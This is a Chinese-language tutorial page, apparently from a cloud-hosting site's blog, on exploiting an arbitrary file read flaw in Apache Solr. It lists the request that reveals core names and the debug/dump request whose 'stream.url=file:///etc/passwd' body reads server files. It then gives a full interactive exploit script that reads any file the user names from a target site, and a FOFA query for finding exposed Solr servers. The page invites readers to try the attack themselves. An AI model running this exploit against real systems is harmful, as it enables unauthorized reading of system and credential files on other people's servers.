您好,登錄后才能下訂單哦!
本篇內容主要講解“Apache-Solr任意文件讀取exp怎么解決”,感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷,實用性強。下面就讓小編來帶大家學習“Apache-Solr任意文件讀取exp怎么解決”吧!
漏洞利用方式很簡單,但是網上說的不是很完整。
首先我們需要訪問:
/solr/admin/cores?indexInfo=false&wt=json
然后看相應數據:
{ "responseHeader":{ "status":0, "QTime":0}, "initFailures":{}, "status":{ "ingredients":{ "name":"ingredients", "instanceDir":"/var/solr/data/ingredients", "dataDir":"/var/solr/data/ingredients/data/", "config":"solrconfig.xml", "schema":"schema.xml", "startTime":"2021-03-18T11:41:26.398Z", "uptime":211644}}}
差不多這個樣子,ingredients就是我們需要的
構造路徑:
"/solr/".ins."/debug/dump?param=ContentStreams&wt=json"
ins就是我們得到的實例對象的名稱
他們說會返回xml格式的,網上的都是不帶wt=json,但是我發現,dump接受這個參數,也會輸出json格式
并且我們在上面獲取ins的時候是可以判斷服務器類型的
上面的話呢應該是:
/solr/ingredients/debug/dump?param=ContentStreams&wt=json
然后是個post數據包,路徑有了,內容就是:
stream.url=file:///etc/passwd
然后也會得到一個json,這里就不帶結果了
最后附上exp:
#define insqian = "name":" #define inshou = " #define contentqian = "stream":" #define contenthou = "}] function Getinstance(url){ res = HttpGetSafe(url."/solr/admin/cores?indexInfo=false&wt=json","User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0"); if(StrFindStr(res[0],"initFailures",0) == "-1"){ return ""; } return GettextMiddle(res[0],insqian,inshou); } function GetFileContent(url,ins,FilePath){ res = HttpPostSafe(url."/solr/".ins."/debug/dump?param=ContentStreams&wt=json","stream.url=file://".FilePath,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0"); con = GettextMiddle(res[0],contentqian,contenthou); return StrReplace(con,"\\n",StrRN()); } function main(args){ print("請輸入測試的站點:"); url = input(); ins = Getinstance(url); if(ins == ""){ print("不存在漏洞"); }else{ print("可能存在漏洞,instanceName:".ins.",請輸入要查看的文件名稱:"); wb = input(); while(wb != "exit"){ print(GetFileContent(url,ins,wb)); wb = input(); } } }
帶一張效果圖:
fofa搜索:
app="Apache-Solr"
到此,相信大家對“Apache-Solr任意文件讀取exp怎么解決”有了更深的了解,不妨來實際操作一番吧!這里是億速云網站,更多相關內容可以進入相關頻道進行查詢,關注我們,繼續學習!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。